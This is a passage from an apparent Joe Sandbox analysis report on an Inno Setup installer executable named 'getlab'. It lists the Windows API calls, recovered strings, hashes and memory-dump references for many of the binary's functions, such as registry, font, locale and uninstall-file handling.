                                                                          • Opcode Fuzzy Hash: c5a987219403fb39552b8629345f90501b93a362f94b22de4e5dcdb6506d09d4
                                                                          • Instruction Fuzzy Hash: 6A21CEB46415047FC710FB2ACC8AE8BBBECDF19319B00457AB958EB392C678DE404668
                                                                          APIs
                                                                            • Part of subcall function 00450900: SetEndOfFile.KERNEL32(?,?,0045C162,00000000,0045C2ED,?,00000000,00000002,00000002), ref: 00450907
                                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 00495A91
                                                                          • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00495AA5
                                                                          • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 00495ABF
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495ACB
                                                                          • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AD1
                                                                          • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 00495AE4
                                                                          Strings
                                                                          • Deleting Uninstall data files., xrefs: 00495A07
                                                                          Similarity
                                                                          • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                          • String ID: Deleting Uninstall data files.
                                                                          • API String ID: 1570157960-2568741658
                                                                          • Opcode ID: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                                          • Instruction ID: 8fd25edfc014547dd13852670f785c7791f766ba0082412c3ee421c8584d85d8
                                                                          • Opcode Fuzzy Hash: 181e5138e971e41075a5f0d412266dd8d351837d1b4a26c408709cd589ae8453
                                                                          • Instruction Fuzzy Hash: 6D217371304610AFEB11E7A6ECC6B2736A8E758328F61453BB5019A1E2D67CAC04CB6C
                                                                          APIs
                                                                            • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                          • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119,?,?,?,?,00000000), ref: 00470083
                                                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,00470119), ref: 0047009A
                                                                          • AddFontResourceA.GDI32(00000000), ref: 004700B7
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004700CB
                                                                          Strings
                                                                          • Failed to set value in Fonts registry key., xrefs: 0047008C
                                                                          • Failed to open Fonts registry key., xrefs: 004700A1
                                                                          • AddFontResource, xrefs: 004700D5
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                          • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                          • API String ID: 955540645-649663873
                                                                          • Opcode ID: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                                          • Instruction ID: 9e1cacd5bb0885738b58fd2773111f6953d7784f445270ce1bd520dac8ad2ca8
                                                                          • Opcode Fuzzy Hash: f5f332fdf6b81b93aa7c4aa8247d012b23b36d83bd75883ed92b8e0c843fb9c6
                                                                          • Instruction Fuzzy Hash: 2921B270741240BBDB10EA669C42FAA77DDCB54708F508437B904EB3C2DA7DAE02966D
                                                                          APIs
                                                                            • Part of subcall function 00416408: GetClassInfoA.USER32(00400000,?,?), ref: 00416477
                                                                            • Part of subcall function 00416408: UnregisterClassA.USER32(?,00400000), ref: 004164A3
                                                                            • Part of subcall function 00416408: RegisterClassA.USER32(?), ref: 004164C6
                                                                          • GetVersion.KERNEL32 ref: 00462C88
                                                                          • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462CC6
                                                                          • SHGetFileInfo.SHELL32(00462D64,00000000,?,00000160,00004011), ref: 00462CE3
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00462D01
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D07
                                                                          • SetCursor.USER32(?,00462D47,00007F02,00462D64,00000000,?,00000160,00004011), ref: 00462D3A
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                          • String ID: Explorer
                                                                          • API String ID: 2594429197-512347832
                                                                          • Opcode ID: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                                          • Instruction ID: fc1c968538dd14d686f90bdc81855b9701391525be241791f09fb78c6da7bbf1
                                                                          • Opcode Fuzzy Hash: 30df62a617669fef841725f59b7241a6ef7ae2a9f6b946bb27ea1461a0e7011c
                                                                          • Instruction Fuzzy Hash: 7A21E7717407047AE720BB768D47F9A3698DB09708F40047FBA09EF2D3D9BC880186AD
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E1D
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00477E23
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E36
                                                                          • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02152BD0,?,?,?,02152BD0), ref: 00477E60
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,02152BD0,00477FC8,00000000,004780E6,?,?,-00000010,?), ref: 00477E7E
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                          • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                          • API String ID: 2704155762-2318956294
                                                                          • Opcode ID: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                                          • Instruction ID: a9b895bb6ebf06323b616d37e9582929c99452ce9f0730db43ffa1519c083574
                                                                          • Opcode Fuzzy Hash: 174de6e33fe68a4e6b56811a15987559e55e5d15ecccd51d737e8050849857cd
                                                                          • Instruction Fuzzy Hash: D1014551788B0436E52031BA0C82FBB244C8F50729F508177BB5CEE2D3EABC9C0201AE
                                                                          APIs
                                                                          • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                          • LocalFree.KERNEL32(005927C8,00000000,00401B68), ref: 00401ACF
                                                                          • VirtualFree.KERNEL32(?,00000000,00008000,005927C8,00000000,00401B68), ref: 00401AEE
                                                                          • LocalFree.KERNEL32(005937C8,?,00000000,00008000,005927C8,00000000,00401B68), ref: 00401B2D
                                                                          • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                          • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                          • String ID: =Y
                                                                          • API String ID: 3782394904-2624468338
                                                                          • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                          • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                          • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                          • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00459DAE,?,00000000,00000000,00000000,?,00000006,?,00000000,00496D69,?,00000000,00496E0C), ref: 00459CF2
                                                                            • Part of subcall function 004543C8: FindClose.KERNEL32(000000FF,004544BE), ref: 004544AD
                                                                          Strings
                                                                          • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459CCC
                                                                          • Failed to strip read-only attribute., xrefs: 00459CC0
                                                                          • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459D67
                                                                          • Stripped read-only attribute., xrefs: 00459CB4
                                                                          • Failed to delete directory (%d). Will retry later., xrefs: 00459D0B
                                                                          • Deleting directory: %s, xrefs: 00459C7B
                                                                          • Failed to delete directory (%d)., xrefs: 00459D88
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseErrorFindLast
                                                                          • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                          • API String ID: 754982922-1448842058
                                                                          • Opcode ID: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                                          • Instruction ID: cce1cab1201e8728e9bc38508445727295e1911ffe2e7292dd45cd7f335e186b
                                                                          • Opcode Fuzzy Hash: 98c166b47c72afa297f55e861990155f618f32ac3a66bf902307907fb8e99ae8
                                                                          • Instruction Fuzzy Hash: F9418230A04259DACB04EB6988013AE76F55F4930AF55857FAC0597393D7BC8E0D879A
                                                                          APIs
                                                                          • GetCapture.USER32 ref: 00422E9C
                                                                          • GetCapture.USER32 ref: 00422EAB
                                                                          • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB1
                                                                          • ReleaseCapture.USER32 ref: 00422EB6
                                                                          • GetActiveWindow.USER32 ref: 00422EC5
                                                                          • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F44
                                                                          • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FA8
                                                                          • GetActiveWindow.USER32 ref: 00422FB7
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                          • String ID:
                                                                          • API String ID: 862346643-0
                                                                          • Opcode ID: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                                          • Instruction ID: a831bf89ec3617aa4b81e8a61b28cb02c358a8e939ae68eb352e359643dafe13
                                                                          • Opcode Fuzzy Hash: b9008f70cee70ce8cdbe9feae850e28bfa4c4446851c9a93175be9357b8d3b25
                                                                          • Instruction Fuzzy Hash: E1414070B00245AFDB10EF69DA46B9E77F1EF48304F5140BAF404AB2A2D7B89E40DB59
                                                                          APIs
                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 0042F2B2
                                                                          • GetWindowLongA.USER32(?,000000EC), ref: 0042F2C9
                                                                          • GetActiveWindow.USER32 ref: 0042F2D2
                                                                          • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F2FF
                                                                          • SetActiveWindow.USER32(?,0042F42F,00000000,?), ref: 0042F320
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveLong$Message
                                                                          • String ID:
                                                                          • API String ID: 2785966331-0
                                                                          • Opcode ID: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                                          • Instruction ID: 9696dc9395d24dec9abacdc10881687288e082ae8fcf9a6a48756090996bfad8
                                                                          • Opcode Fuzzy Hash: a223125d65db3de814fb2ac44b456330cdbbeb03ed1e631204e072d19995624a
                                                                          • Instruction Fuzzy Hash: A431A171A00714AFDB01EFB9DC52E6E7BF8EB09714B9148BAF804E7291D7389D10CA58
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000), ref: 00429482
                                                                          • GetTextMetricsA.GDI32(00000000), ref: 0042948B
                                                                            • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0042949A
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004294A7
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 004294AE
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004294B6
                                                                          • GetSystemMetrics.USER32(00000006), ref: 004294DB
                                                                          • GetSystemMetrics.USER32(00000006), ref: 004294F5
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Metrics$ObjectSelectSystemText$A480A570CreateFontIndirect
                                                                          • String ID:
                                                                          • API String ID: 361401722-0
                                                                          • Opcode ID: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                                          • Instruction ID: 79023d5d76270fc5b80a90959683f08304bbfc9b3a68a0d1de019d9dda53e89a
                                                                          • Opcode Fuzzy Hash: 9352f0de83d2aa8ef3dc5e588d401a22e63a3fe7846e7c3b2a64ff92932535c4
                                                                          • Instruction Fuzzy Hash: FE01C0A17087503BE311767A9CC6F6F65C8DB44358F84043BF686D63D3D9AC9C81876A
                                                                          APIs
                                                                          • 73A1A570.USER32(00000000,?,00419051,004980EA), ref: 0041DE1F
                                                                          • 73A24620.GDI32(00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE29
                                                                          • 73A1A480.USER32(00000000,00000000,00000000,0000005A,00000000,?,00419051,004980EA), ref: 0041DE36
                                                                          • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE45
                                                                          • GetStockObject.GDI32(00000007), ref: 0041DE53
                                                                          • GetStockObject.GDI32(00000005), ref: 0041DE5F
                                                                          • GetStockObject.GDI32(0000000D), ref: 0041DE6B
                                                                          • LoadIconA.USER32(00000000,00007F00), ref: 0041DE7C
                                                                          Memory Dump Source
                                                                           • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectStock$A24620A480A570IconLoad
                                                                          • String ID:
                                                                          • API String ID: 3573811560-0
                                                                          • Opcode ID: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                                          • Instruction ID: 462cd7651d9f59a3c1518f9422d26db27efab3bc10fcb75ee14264e6343fb545
                                                                          • Opcode Fuzzy Hash: 710d086b1de04f4d575db38747d659360b557b0cb5838dc09f26a38d22fa0d7e
                                                                          • Instruction Fuzzy Hash: 0E11EC706456055AE340FFAA6A52BAA3695E724708F00813FF6099F3D1D77D2C444B9F
                                                                          APIs
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046316C
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,00463201), ref: 00463172
                                                                          • SetCursor.USER32(?,004631E9,00007F02,00000000,00463201), ref: 004631DC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$Load
                                                                          • String ID: $ $Internal error: Item already expanding
                                                                          • API String ID: 1675784387-1948079669
                                                                          • Opcode ID: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                                          • Instruction ID: 8c03ff8e54c482a295deb11cd31210a84b03b27930917a3eb50de1af6f5dfb0a
                                                                          • Opcode Fuzzy Hash: 18a8c92a23110e1585e61799d78ad50682638d437455fe8a8eac84c2222b077b
                                                                          • Instruction Fuzzy Hash: A7B1C430A00284DFD711DF69C589B9ABBF1FF04305F1484AAE8459B792EB78EE45CB19
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453DEB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                          • API String ID: 390214022-3304407042
                                                                          • Opcode ID: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                                          • Instruction ID: 27719b604a15c88968755e1a1929315a4e70c7568c957628d41e5ea0e69e6a26
                                                                          • Opcode Fuzzy Hash: 7a42a0697151d0d5d2c191e5f1412612b4bf9d75eff795acc860741356bb7580
                                                                          • Instruction Fuzzy Hash: DD914434E001099BDF11EFA5D882BDEB7F5EF4834AF508066E90077292D778AE49CB58
                                                                          APIs
                                                                          • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 0047673D
                                                                          • 73A259E0.USER32(00000000,000000FC,00476698,00000000,0047697C,?,00000000,004769A6), ref: 00476764
                                                                          • GetACP.KERNEL32(00000000,0047697C,?,00000000,004769A6), ref: 004767A1
                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004767E7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: A259ClassInfoMessageSend
                                                                          • String ID: COMBOBOX$Inno Setup: Language
                                                                          • API String ID: 3217714596-4234151509
                                                                          • Opcode ID: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                                          • Instruction ID: 91173772f4e079f50c7e0c6215708d31291a540b6063389a75a2ac3d3f1b2ee4
                                                                          • Opcode Fuzzy Hash: c91c96764c9eb46afea8f4730bcae4c036a3e37d4e33096e95ae453515e7d384
                                                                          • Instruction Fuzzy Hash: 68814074A006059FCB10EF69C985AEAB7F5FB09304F56C0BAE808E7362D734AD45CB59
                                                                          APIs
                                                                          • GetSystemDefaultLCID.KERNEL32(00000000,00408958,?,?,?,?,00000000,00000000,00000000,?,0040995F,00000000,00409972), ref: 0040872A
                                                                            • Part of subcall function 00408558: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408623,?,00000000,00408702), ref: 00408576
                                                                            • Part of subcall function 004085A4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087A6,?,?,?,00000000,00408958), ref: 004085B7
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale$DefaultSystem
                                                                          • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                          • API String ID: 1044490935-665933166
                                                                          • Opcode ID: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                                          • Instruction ID: acf8fabd4b29bc0114a799655761a3ccdfd58ddc6ec536e3fe46e21ad76a8ffd
                                                                          • Opcode Fuzzy Hash: e4d4874023cbce5b0e58a93798fb9a357b254c43991a542c79008375c0b91d34
                                                                          • Instruction Fuzzy Hash: 85515C24B001486BDB00FBA99E91A9E77A9DB84308F50C47FA151BB3C7CE3CDA05975D
                                                                          APIs
                                                                          • GetVersion.KERNEL32(00000000,004118F1), ref: 00411784
                                                                          • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 00411842
                                                                            • Part of subcall function 00411AA4: CreatePopupMenu.USER32 ref: 00411ABE
                                                                          • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118CE
                                                                            • Part of subcall function 00411AA4: CreateMenu.USER32 ref: 00411AC8
                                                                          • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118B5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmp
